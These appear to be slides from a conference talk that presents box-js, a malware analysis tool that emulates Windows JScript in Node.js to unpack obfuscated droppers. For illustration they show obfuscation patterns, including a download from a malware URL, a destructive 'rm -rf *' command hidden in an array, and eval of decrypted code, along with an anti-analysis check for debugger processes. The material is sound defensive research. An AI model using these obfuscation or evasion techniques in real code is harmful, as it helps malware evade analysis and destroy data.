@CapacitorSet
These slides were presented at ESC17 in Venice. They give an overview of how box-js works and what niche it fills.
Attenton: many slides continue to the bottom, not to the right.
Some slides include "speaker notes" (personal notes not shown to the public), which will appear in a grey box.
Original code: it's there, but we can't read it
Formatted code
Equivalent, but unreadable code
download("http://malware.ru/") | download(base64decode("...")) | Use of encodings |
beEvil(); | code = decrypt("..."); eval(code) | Use of cryptography (XOR) |
shell.Execute("rm -rf *"); | things = ["rm -rf *", "Execute"]; shell[things[1]](things[0]); | Constants → variables in an array |
Malware has measures against automated analysis:
processList = GetObject("WinMgmts:").InstancesOf("Win32_Process")
isVM = false;
for (i = 0; i < processList.length; i++) {
if (processList[i] == "Wireshark.exe") isVM = true;
if (processList[i] == "OllyDbg.exe") isVM = true;
if (processList[i] == "...") isVM = true;
}
if (!isVM) {
// ...
}
Emulating the Javascript environment |
Microsoft JScript is a JavaScript dialect
Any JavaScript engine can run JScript, with modifications
Which engine? Node.js (V8). Developed by Google, works on the command line, same engine as Chrome
We want to create "fake" libraries, that emulate the real ones and capture informations
Fictitious versions (stub) of the ActiveX components we are interested in
They seem to work correctly, but log interactions:
class XMLHTTP {
download(url) {
headers["User-Agent"] = "Internet Explorer 6.0";
print(`New request to ${url}`);
output = request("GET", url);
print(`I downloaded ${output.length} byte.`);
print("File type: " + identify(output));
return output;
}
}
We dissect the code and add new nodes
eval(foobar.decrypt() + "unknown code")
eval(rewrite(foobar.decrypt() + "unknown code"))
Note for the reader: in this phase I open a shell, run a command to analyze a sample, and go through the output of box-js. In particular, I try both the offline analysis and passing --download, where I show that the second stage is downloaded correctly, and finally I upload the second stage to VirusTotal and verify that it is malicious.
In practice:
We need an isolated, easily-reproducible environment
We useDocker containers: isolated from the host, instanced in a single command:
docker run CapacitorSet/box-js \ # Image name
--volume ~/sample.js:/samples/ \ # Shared folders
--env "QUEUE_IP=172.17.0.1" # Environment variables
We need to put samples to be analyzed in a sample, and process them with several workers
We create a work queue with RabbitMQ
Easily scalable approach: we can add and remove workers at will
Typical scenario: malware analysis researcher/company
The user quickly extracts the second stages, either as URLs or as files, and can analyze them with VirusTotal/Malwr/other sandboxes
In short: emulation simplifies and speeds up first-stage analysis, and results in more accurate analyses
My malware analysis project:
https://github.com/CapacitorSet/box-js